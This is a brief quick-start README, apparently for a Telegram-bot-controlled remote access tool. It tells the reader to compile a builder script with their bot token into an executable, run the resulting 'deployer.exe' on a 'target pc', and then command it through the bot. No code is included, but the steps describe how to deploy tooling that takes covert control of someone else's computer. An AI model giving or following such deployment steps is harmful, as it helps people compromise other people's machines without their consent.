-- quick start --
- Install Python on your PC
- Run "pip install ..." command from req.txt in shell
- create a telegram bot with @BotFather
- get your bot token from @BotFather
- Run "builder.py", change var BOT_TOKEN to ur bot token and compile to EXE
- Run deployer.exe on target pc
- send /start to ur bot
- Done!